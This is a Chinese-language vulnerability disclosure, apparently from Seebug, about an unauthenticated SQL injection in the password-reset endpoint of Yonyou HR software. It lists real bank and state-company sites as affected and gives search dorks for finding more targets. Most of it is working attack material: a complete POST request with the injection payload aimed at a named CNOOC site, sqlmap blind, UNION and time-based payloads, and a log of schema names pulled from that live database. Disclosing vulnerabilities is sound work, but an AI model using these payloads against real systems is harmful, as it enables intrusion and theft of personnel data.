用友人力资源管理软件SQL注入漏洞(无需登录,影响所有版本)

2014-08-07T00:00:00
ID SSV:93241
Type seebug
Reporter Root
Modified 2014-08-07T00:00:00

Description

简要描述:

详细说明:

用友软件:

<img src="https://images.seebug.org/upload/201408/0714585248f3d3584928a6f7d00d809e2010f057.jpg" alt="WE0X)RCOLSDFMS(XFSKO5.jpg" width="600" onerror="javascript:errimg(this);">

涉及客户非常多。都是大型国企、银行、能源、金融重要单位。 举例如下: 大连银行 http://zpyc.bankofdl.com 顺德农商行 http://career.sdebank.com 中国海洋石油总公司 http://zhaopin.cnooc.com.cn 北京市建筑设计研究院 www.biad.com.cn:88/ 民生银行 http://ehr.creditcard.cmbc.com.cn 中国中铁 http://61.232.6.108/ ....等等单位 直接谷歌搜 inurl:hrss/login.jsp inurl:hrss/rm inurl:hrss/index.html 。。。 由于某一参数rdp xml 注入。。。

POST /hrss/dorado/smartweb2.RPC.d?__rpc=true HTTP/1.1 Content-Length: 564 Content-Type: application/x-www-form-urlencoded X-Requested-With: XMLHttpRequest Referer: http://zhaopin.cnooc.com.cn:80/ Cookie: JSESSIONID=EC2B32915FC45B239F95F8D334CB81D6.server; JSESSIONID=8D59F955762550CE8ACB019EEDD59700.server Host: zhaopin.cnooc.com.cn Connection: Keep-alive Accept-Encoding: gzip,deflate User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.63 Safari/537.36 1407388061721&__type=updateData&__viewInstanceId=nc.bs.hrss.login.ResetPassword~nc.bs.hrss.login.ResetPasswordViewModel&__xml=&lt;rpc%20transaction%3d%2210%22%20method%3d%22resetPwd%22&gt;&lt;def&gt;&lt;dataset%20type%3d%22Custom%22%20id%3d%22dsResetPwd%22&gt;&lt;f%20name%3d%22user%22&gt;&lt;/f&gt;&lt;f%20name%3d%22ID%22&gt;&lt;/f&gt;&lt;/dataset&gt;&lt;/def&gt;&lt;data&gt;&lt;rs%20dataset%3d%22dsResetPwd%22&gt;&lt;r%20id%3d%2210009%22%20state%3d%22insert%22&gt;&lt;n&gt;&lt;v&gt;-1%26apos;%20OR%201%3d1%20*%20--%20&lt;/v&gt;&lt;v&gt;e&lt;/v&gt;&lt;/n&gt;&lt;/r&gt;&lt;/rs&gt;&lt;/data&gt;&lt;vps&gt;&lt;p%20name%3d%22__profileKeys%22&gt;findPwd%253B15b021628b8411d33569071324dc1b37&lt;/p&gt;&lt;/vps&gt;&lt;/rpc&gt;

已经构造好注入包

<img src="https://images.seebug.org/upload/201408/071506319a91835b312bda7fb805625b72bd8206.jpg" alt="1.jpg" width="600" onerror="javascript:errimg(this);">

<img src="https://images.seebug.org/upload/201408/07150654e5726b3c4ea44cf0b26f0bf6b20ad43e.jpg" alt="2.jpg" width="600" onerror="javascript:errimg(this);">

``` Place: (custom) POST Parameter: #1* Type: boolean-based blind Title: AND boolean-based blind - WHERE or HAVING clause Payload: 1407388061721&__type=updateData&__viewInstanceId=nc.bs.hrss.login.R esetPassword~nc.bs.hrss.login.ResetPasswordViewModel&__xml=<rpc%20transaction%3d %2210%22%20method%3d%22resetPwd%22><def><dataset%20type%3d%22Custom%22%20id%3d%2 2dsResetPwd%22><f%20name%3d%22user%22></f><f%20name%3d%22ID%22></f></dataset></d ef><data><rs%20dataset%3d%22dsResetPwd%22><r%20id%3d%2210009%22%20state%3d%22ins ert%22><n><v>-1%26apos;%20OR%201%3d1%20 AND 6102=6102%20--%20</v><v>e</v></n></r ></rs></data><vps><p%20name%3d%22__profileKeys%22>findPwd%253B15b021628b8411d335 69071324dc1b37</p></vps></rpc> Type: UNION query Title: Generic UNION query (NULL) - 11 columns Payload: 1407388061721&__type=updateData&__viewInstanceId=nc.bs.hrss.login.R esetPassword~nc.bs.hrss.login.ResetPasswordViewModel&__xml=<rpc%20transaction%3d %2210%22%20method%3d%22resetPwd%22><def><dataset%20type%3d%22Custom%22%20id%3d%2 2dsResetPwd%22><f%20name%3d%22user%22></f><f%20name%3d%22ID%22></f></dataset></d ef><data><rs%20dataset%3d%22dsResetPwd%22><r%20id%3d%2210009%22%20state%3d%22ins ert%22><n><v>-1%26apos;%20OR%201%3d1%20 UNION ALL SELECT NULL,NULL,NULL,NULL,NUL L,NULL,CHR(58)||CHR(121)||CHR(109)||CHR(97)||CHR(58)||CHR(74)||CHR(85)||CHR(85)| |CHR(66)||CHR(117)||CHR(109)||CHR(117)||CHR(110)||CHR(114)||CHR(105)||CHR(58)||C HR(113)||CHR(115)||CHR(110)||CHR(58),NULL,NULL,NULL,NULL FROM DUAL-- %20--%20</v ><v>e</v></n></r></rs></data><vps><p%20name%3d%22__profileKeys%22>findPwd%253B15 b021628b8411d33569071324dc1b37</p></vps></rpc> Type: AND/OR time-based blind Title: Oracle AND time-based blind Payload: 1407388061721&__type=updateData&__viewInstanceId=nc.bs.hrss.login.R esetPassword~nc.bs.hrss.login.ResetPasswordViewModel&__xml=<rpc%20transaction%3d %2210%22%20method%3d%22resetPwd%22><def><dataset%20type%3d%22Custom%22%20id%3d%2 2dsResetPwd%22><f%20name%3d%22user%22></f><f%20name%3d%22ID%22></f></dataset></d ef><data><rs%20dataset%3d%22dsResetPwd%22><r%20id%3d%2210009%22%20state%3d%22ins ert%22><n><v>-1%26apos;%20OR%201%3d1%20 AND 3314=DBMS_PIPE.RECEIVE_MESSAGE(CHR(6 8)||CHR(115)||CHR(69)||CHR(71),5)%20--%20</v><v>e</v></n></r></rs></data><vps><p %20name%3d%22__profileKeys%22>findPwd%253B15b021628b8411d33569071324dc1b37</p></ vps></rpc>


[14:52:41] [INFO] the back-end DBMS is Oracle web application technology: JSP back-end DBMS: Oracle [14:52:41] [WARNING] schema names are going to be used on Oracle for enumeration as the counterpart to database names on other DBMSes [14:52:41] [INFO] fetching database (schema) names [14:52:41] [WARNING] the SQL query provided does not return any output [14:52:41] [WARNING] in case of continuous data retrieval problems you are advis ed to try a switch '--no-cast' and/or switch '--hex' [14:52:41] [INFO] fetching number of databases [14:52:41] [WARNING] running in a single-thread mode. Please consider usage of o ption '--threads' for faster data retrieval [14:52:41] [INFO] retrieved: 20 [14:53:05] [INFO] retrieved: APEX_030200 [14:57:28] [INFO] retrieved: APPQOSSYS [15:00:59] [INFO] retrieved: CNOOC [15:03:06] [INFO] retrieved: CTXSYS [15:05:41] [INFO] retrieved: DBSNMP [15:08:15] [INFO] retrieved: EXFSYS [15:10:46] [INFO] retrieved: FLOWS_FILES [15:15:05] [INFO] retrieved: MDSYS [15:17:27] [INFO] retrieved: OLAP [15:19:46] [CRITICAL] unable to connect to the target url or proxy. sqlmap is go ing to retry the request SYS [15:20:54] [INFO] retrieved: [15:21:28] [CRITICAL] unable to connect to the target url or proxy. sqlmap is go ing to retry the request ORD ```

漏洞证明:

<img src="https://images.seebug.org/upload/201408/07152349471859539501ae2401192f5dfbcdfa17.jpg" alt="3.jpg" width="600" onerror="javascript:errimg(this);">